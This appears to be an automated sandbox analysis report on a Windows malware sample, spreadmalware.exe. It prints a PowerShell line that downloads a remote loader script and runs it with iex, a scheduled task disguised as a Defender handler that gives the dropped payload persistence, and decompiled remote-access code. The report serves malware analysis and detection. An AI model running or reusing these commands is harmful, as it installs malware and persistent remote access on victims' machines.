Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasapi32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasman.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rtutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: schannel.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mskeyprotect.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncrypt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncryptsslp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasapi32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasman.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rtutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll

Source: C:\Windows\System32\wbem\WMIC.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32

Jump to behavior

Source: C:\Windows\System32\mshta.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Settings

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\Desktop\spreadmalware.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source: spreadmalware.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: spreadmalware.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: powershell.pdbUGP source: DisplayDriverUpdater.exe, 0000005D.00000000.1866745874.00007FF62A59A000.00000002.00000001.01000000.00000015.sdmp
Source:	Binary string: powershell.pdb source: DisplayDriverUpdater.exe, 0000005D.00000000.1866745874.00007FF62A59A000.00000002.00000001.01000000.00000015.sdmp

Data Obfuscation

.NET source code contains method to dynamically call methods (often used by packers)

Source: spreadmalware.exe, BEentNSOVA5WLrY8wP.cs	.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
Source: 51.2.powershell.exe.2b2016349c0.0.raw.unpack, Messages.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 51.2.powershell.exe.2b2016349c0.0.raw.unpack, Messages.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 51.2.powershell.exe.2b268dd0000.1.raw.unpack, Messages.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 51.2.powershell.exe.2b268dd0000.1.raw.unpack, Messages.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)

.NET source code contains potential unpacker

Source: spreadmalware.exe, eMnSNnvedll7JfhDlD.cs	.Net Code: CypJmveSq System.AppDomain.Load(byte[])
Source: 51.2.powershell.exe.2b2016349c0.0.raw.unpack, Messages.cs	.Net Code: Plugin System.AppDomain.Load(byte[])
Source: 51.2.powershell.exe.2b2016349c0.0.raw.unpack, Messages.cs	.Net Code: Memory System.AppDomain.Load(byte[])
Source: 51.2.powershell.exe.2b2016349c0.0.raw.unpack, Messages.cs	.Net Code: Memory
Source: 51.2.powershell.exe.2b268dd0000.1.raw.unpack, Messages.cs	.Net Code: Plugin System.AppDomain.Load(byte[])
Source: 51.2.powershell.exe.2b268dd0000.1.raw.unpack, Messages.cs	.Net Code: Memory System.AppDomain.Load(byte[])
Source: 51.2.powershell.exe.2b268dd0000.1.raw.unpack, Messages.cs	.Net Code: Memory

Suspicious powershell command line found

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command iwr 'https://github.com/EvilBytecode/Sryxen/releases/download/v1.0.0/sryxen_loader.ps1' \| iex
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command iwr 'https://github.com/EvilBytecode/Sryxen/releases/download/v1.0.0/sryxen_loader.ps1' \| iex
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command iwr 'https://github.com/EvilBytecode/Sryxen/releases/download/v1.0.0/sryxen_loader.ps1' \| iex
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command iwr 'https://github.com/EvilBytecode/Sryxen/releases/download/v1.0.0/sryxen_loader.ps1' \| iex

Source: DisplayDriverUpdater.exe.41.dr

Static PE information: 0x7EDA4115 [Wed Jun 10 07:45:25 2037 UTC]

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\m1dly232\m1dly232.cmdline"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\c2ejd4wa\c2ejd4wa.cmdline"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\m1dly232\m1dly232.cmdline"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\c2ejd4wa\c2ejd4wa.cmdline"

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 41_2_00007FFAA9DE9A4D push eax; iretd	41_2_00007FFAA9DE9A61
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 41_2_00007FFAA9DE7C5E push eax; retf	41_2_00007FFAA9DE7C6D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 41_2_00007FFAA9DE845E push eax; ret	41_2_00007FFAA9DE846D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 41_2_00007FFAA9DE7C2E pushad ; retf	41_2_00007FFAA9DE7C5D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 41_2_00007FFAA9DE842E pushad ; ret	41_2_00007FFAA9DE845D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 41_2_00007FFAA9DE1085 push E85D11FBh; ret	41_2_00007FFAA9DE10F9
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 41_2_00007FFAA9EBC3A4 push eax; ret	41_2_00007FFAA9EBC3A5
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 41_2_00007FFAA9EB2365 push 8B485F92h; iretd	41_2_00007FFAA9EB236D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 46_2_00007FFAA9CDD2A5 pushad ; iretd	46_2_00007FFAA9CDD2A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 46_2_00007FFAA9DF19E2 pushad ; ret	46_2_00007FFAA9DF19F1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 51_2_00007FFAA9DC407B push eax; iretd	51_2_00007FFAA9DC408D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 51_2_00007FFAA9DC9038 push eax; ret	51_2_00007FFAA9DC9039
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 51_2_00007FFAA9E96DC4 push esi; iretd	51_2_00007FFAA9E96DC7
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 61_2_00007FFAA9CCD2A5 pushad ; iretd	61_2_00007FFAA9CCD2A6

Source: spreadmalware.exe, eMnSNnvedll7JfhDlD.cs	High entropy of concatenated method names: 'UgK4kaRLM', 'LvyNSRrWBWLky61VFj', 'baunkdhFCUx0eOo6nQ', 'YQCvyL4sFikBlH2kmv', 'rx4UWJgLY533EthiO9', 'uFTG4nTI3965kXyhgK', 'AvGrmf3nlUC3Y5h8ij', 'CypJmveSq', 'ONgjq0ulEJIT7me2xl', 'w06YPOmrIhJUj8lMON'
Source: spreadmalware.exe, dQlrlujvqVL7nB1GND.cs	High entropy of concatenated method names: 'eKnSA9xxHJVN7', 'ldoZpMyP67cKi5ocnm', 'zLAr6jPGO2vfZsAHv8', 'Mm8sT5kKpBJh05msRC', 'UwXZ9TE6k7xeKW5Myf', 'adhIujH0qGPnigkfuP', 'YBH9P7ZG6EVmJUA3uU', 'LPvvsk1ZK1mpuUZsEF', 'z7JGDWcBchdpl8Pma3', 'paNC6jM19OJFy508kr'
Source: spreadmalware.exe, DdegKX0LdpE1MkZX6U.cs	High entropy of concatenated method names: 'axnJIvrSZN', 'ELmJ2dFLqQ', 'SHZJCNjLb4', 'gRPJ7bxQkV', 'Ea3JdG1PG4', 'WorJ8UeTlG', 'N1nJxOeKCX', 'li9J5TAMQA', 'KnDJQco9Vq', 'ziwJXAD4mY'
Source: spreadmalware.exe, BEentNSOVA5WLrY8wP.cs	High entropy of concatenated method names: 'WHDtGMItByoXW2suXb', 'soZw7kdQIbrtDR6hiX', 'NWb2LcvEkrfeSwdJ6H', 'ya9bYfVMywUx00ykJs', 'lMoJJl1C21', 'kcX5tt0M8VAr52VAdi', 'dvCFOYOLdnNYk0XGg3', 'gfPMOtn71CXUgL160H', 'LiuLRtJ9V1KVdxGW3m', 'IcDmEjapJ63SAvurvh'

Persistence and Installation Behavior

Uses cmd line tools excessively to alter registry or file data

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: attrib.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: attrib.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: attrib.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: attrib.exe

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\DisplayDriverUpdater.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	File created: C:\Users\user\AppData\Local\Temp\c2ejd4wa\c2ejd4wa.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	File created: C:\Users\user\AppData\Local\Temp\m1dly232\m1dly232.dll	Jump to dropped file

Boot Survival

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "Microsoft Defender Threat Intelligence Handler" /sc ONLOGON /tr C:\Users\user\AppData\Roaming\DisplayDriverUpdater.exe /rl HIGHEST

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1

Tries to open files direct via NTFS file id

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: NULL
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: NULL

Source: C:\Users\user\Desktop\spreadmalware.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\spreadmalware.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\spreadmalware.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\spreadmalware.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\spreadmalware.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\spreadmalware.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\spreadmalware.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\spreadmalware.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\spreadmalware.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\spreadmalware.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\spreadmalware.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\spreadmalware.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\spreadmalware.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\spreadmalware.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\spreadmalware.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\spreadmalware.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\spreadmalware.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\spreadmalware.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\spreadmalware.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\spreadmalware.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\spreadmalware.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\spreadmalware.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\spreadmalware.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\spreadmalware.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\spreadmalware.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\spreadmalware.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\spreadmalware.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\spreadmalware.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\spreadmalware.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\spreadmalware.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\spreadmalware.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\spreadmalware.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\spreadmalware.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\spreadmalware.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\spreadmalware.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\spreadmalware.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\spreadmalware.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\spreadmalware.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\spreadmalware.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\spreadmalware.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\spreadmalware.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\spreadmalware.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\spreadmalware.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\spreadmalware.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
